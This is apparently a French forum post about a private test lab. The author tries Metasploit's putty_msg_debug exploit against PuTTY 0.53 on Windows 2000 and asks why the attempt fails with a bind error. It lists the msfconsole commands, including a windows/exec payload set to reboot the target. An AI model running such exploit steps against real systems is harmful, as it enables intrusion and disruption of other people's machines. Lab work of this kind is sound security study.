Comme convenu le détail de la configuration de ma plateforme de tests :
Systeme cible : Windows 2000 sp4 ENG
network configuration 192.168.0.1
-Putty 0.53 (exploit windows/ssh/putty_msg_debug)
Systeme attaquant : Ubuntu 9.04
network configuration 192.168.0.2
-metasploit Framework 3.02
packages additionnels :# apt-get install ruby libruby rdoc
# apt-get install libyaml-ruby
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
# apt-get install libdl-ruby
# apt-get install libreadline-ruby
# apt-get install libiconv-ruby
# apt-get install rubygems
mise en application :sur la cible:connection SSH depuis 192.168.0.1 vers 192.168.0.2 en utilisant le client putty
sur le poste utilisant metasploit :msf > use windows/ssh/putty_msg_debug
msf exploit(putty_msg_debug) > set SRVHOST 192.168.0.1
msf exploit(putty_msg_debug) > set payload windows/exec
msf exploit(putty_msg_debug) > set CMD shutdown -r
msf exploit(putty_msg_debug) > exploit
- Exploit running as background job.
msf exploit(putty_msg_debug) >
[-] Exploit failed: Cannot assign requested address - bind(2)
j' ai testé d'autre payloads mais le resultat reste le meme ...